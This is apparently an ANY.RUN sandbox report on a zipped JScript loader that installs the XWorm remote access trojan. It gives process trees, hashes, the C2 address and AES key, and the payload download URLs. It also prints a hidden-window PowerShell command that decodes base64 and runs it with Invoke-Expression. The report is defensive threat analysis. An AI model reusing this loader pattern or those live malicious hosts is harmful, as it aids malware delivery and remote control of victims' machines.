File name:

JSLoader.zip

Full analysis: https://app.any.run/tasks/3cfe8a57-8c11-4ad3-9a61-9954f62a86b3
Verdict: Malicious activity
Threats:

XWorm is a remote access trojan (RAT) sold as a malware-as-a-service. It possesses an extensive hacking toolset and is capable of gathering private information and files from the infected computer, hijacking MetaMask and Telegram accounts, and tracking user activity. XWorm is typically delivered to victims' computers through multi-stage attacks that start with phishing emails.

Analysis date: May 17, 2025, 15:43:54
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-scr
remote
xworm
Indicators:
MIME: application/zip
File info: Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
MD5:

BC2DCE36F833119595C7BAA6D2C87A58

SHA1:

30A56ACDD1599220AEEF0981A8CBEAF777F1BDE0

SHA256:

E7991E4A7EFDA5CE512DF7E28B602C798E581193A42040759E7FEF4EC43E2C20

SSDEEP:

96:BaDPGLs/3mTv0W7tede4ekKlM61WzQYricjDcHlQmYpRgSg/5V:QDOLsO9kwlV0EYr5oDYpIP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is, for user acknowledgement only. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS

    • Sends HTTP request (SCRIPT)

      • wscript.exe (PID: 7152)
    • Generic archive extractor

      • WinRAR.exe (PID: 5376)
    • Opens an HTTP connection (SCRIPT)

      • wscript.exe (PID: 7152)
    • Creates internet connection object (SCRIPT)

      • wscript.exe (PID: 7152)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 5892)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 5892)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 5892)
    • XWORM has been detected (YARA)

      • MSBuild.exe (PID: 660)
    • XWORM has been detected (SURICATA)

      • MSBuild.exe (PID: 660)
  • SUSPICIOUS

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 7152)
    • Executes script without checking the security policy

      • powershell.exe (PID: 5892)
    • Possibly malicious use of IEX has been detected

      • wscript.exe (PID: 7152)
    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 7152)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 7152)
    • Connects to unusual port

      • MSBuild.exe (PID: 660)
    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 7152)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 5892)
    • Base64-obfuscated command line is found

      • wscript.exe (PID: 7152)
    • Contacting a server suspected of hosting a CnC

      • MSBuild.exe (PID: 660)
  • INFO

    • Manual execution by a user

      • wscript.exe (PID: 7152)
    • Checks proxy server information

      • wscript.exe (PID: 7152)
      • powershell.exe (PID: 5892)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 5892)
    • Reads the computer name

      • MSBuild.exe (PID: 660)
    • Checks supported languages

      • MSBuild.exe (PID: 660)
    • Reads the machine GUID from the registry

      • MSBuild.exe (PID: 660)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 5892)
    • Disables trace logs

      • powershell.exe (PID: 5892)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 5892)
    • Reads the software policy settings

      • slui.exe (PID: 536)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

XWorm

(PID) Process: (660) MSBuild.exe
C2: backupclientes.ddns.net:7000
Keys
AES: <123456789>
Options
Splitter: <Xwormmm>
Sleep time: 3
USB drop name: XWorm V5.2
Mutex: w4cd4aBNsA6Erfi2
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 51
ZipBitFlag: 0x0003
ZipCompression: Unknown (99)
ZipModifyDate: 2025:05:17 15:40:52
ZipCRC: 0xc8956013
ZipCompressedSize: 4040
ZipUncompressedSize: 360071
ZipFileName: 9f28f82d21fe99d0efdcab403f73870d68fd94e6d0f762e658d923ccd1e7424c.js
No data.
All screenshots are available in the full report
Total processes
136
Monitored processes
9
Malicious processes
3
Suspicious processes
0

Behavior graph

Processes shown in the behavior graph (from the start node): winrar.exe (no specs), sppextcomobj.exe (no specs), slui.exe, wscript.exe, powershell.exe, conhost.exe (no specs), msbuild.exe (#XWORM), svchost.exe, slui.exe (no specs)

Process information

PID
CMD
Path
Indicators
Parent process
PID: 536
CMD: "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent
Path: C:\Windows\System32\slui.exe
Parent process: SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 660
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
PID: 2196
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID: 4208
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 5376
CMD: "C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\JSLoader.zip
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 5552
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 5892
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$sartainty = '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' -replace '','';$slipperier = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($sartainty));Invoke-Expression $slipperier;"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 6436
CMD: C:\WINDOWS\system32\SppExtComObj.exe -Embedding
Path: C:\Windows\System32\SppExtComObj.Exe
Parent process: svchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
PID: 7152
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\9f28f82d21fe99d0efdcab403f73870d68fd94e6d0f762e658d923ccd1e7424c.js"
Path: C:\Windows\System32\wscript.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
8 965
Read events
8 945
Write events
20
Delete events
0

Modification events

Process: (5376) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 3
Value: C:\Users\admin\Desktop\preferences.zip

Process: (5376) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 2
Value: C:\Users\admin\Desktop\chromium_ext.zip

Process: (5376) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 1
Value: C:\Users\admin\Desktop\omni_23_10_2024_.zip

Process: (5376) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 0
Value: C:\Users\admin\AppData\Local\Temp\JSLoader.zip

Process: (5376) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: name
Value: 120

Process: (5376) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: size
Value: 80

Process: (5376) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: type
Value: 120

Process: (5376) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: mtime
Value: 100

Process: (5376) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface
Operation: write
Name: ShowPassword
Value: 0

Process: (7152) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation: write
Name: JScriptSetScriptStateStarted
Value: 8CF0100000000000
Executable files
0
Suspicious files
1
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
PID: 5892
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rv5ppi2f.4mq.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 5892
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xjtphitg.ykp.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 5376
Process: WinRAR.exe
Filename: C:\Users\admin\AppData\Local\Temp\Rar$DRb5376.45614\9f28f82d21fe99d0efdcab403f73870d68fd94e6d0f762e658d923ccd1e7424c.js
Type: text
MD5: 1C244BA5CF7EAE15117D0819B8018A43
SHA256: 9F28F82D21FE99D0EFDCAB403F73870D68FD94E6D0F762E658D923CCD1E7424C

PID: 5892
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Type: binary
MD5: DD2EDC50A8FAEB70CB6DBAB9320B0001
SHA256: 76597DB7879875CD3E76AC7B0220B1A24D5F69643583B74202109849A83E052D
HTTP(S) requests
7
TCP/UDP connections
26
DNS requests
17
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.216.77.20:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
7152
wscript.exe
GET
301
82.29.188.81:80
http://javaaplugin.com/arquivo_c464ff979c334e3498cda1e191ff4ff4.txt
unknown
unknown
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5892
powershell.exe
GET
301
82.29.188.81:80
http://javaaplugin.com/arquivo_030c6bfec1504839abb280cb4366b08f.txt
unknown
unknown
4244
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
4244
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
23.216.77.20:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2.23.246.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
40.126.31.3:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
7152
wscript.exe
82.29.188.81:80
javaaplugin.com
Virgin Media Limited
GB
unknown
7152
wscript.exe
82.29.188.81:443
javaaplugin.com
Virgin Media Limited
GB
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
crl.microsoft.com
  • 23.216.77.20
  • 23.216.77.18
  • 23.216.77.27
  • 23.216.77.26
  • 23.216.77.11
  • 23.216.77.17
  • 23.216.77.25
  • 23.216.77.19
  • 23.216.77.12
whitelisted
www.microsoft.com
  • 2.23.246.101
whitelisted
google.com
  • 172.217.16.206
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted
login.live.com
  • 40.126.31.3
  • 20.190.159.68
  • 20.190.159.4
  • 20.190.159.128
  • 40.126.31.69
  • 20.190.159.71
  • 40.126.31.67
  • 40.126.31.0
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
javaaplugin.com
  • 82.29.188.81
unknown
ia601304.us.archive.org
  • 207.241.227.174
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DNS Query to DynDNS Domain *.ddns .net
660
MSBuild.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] Xworm TCP Packet
No debug info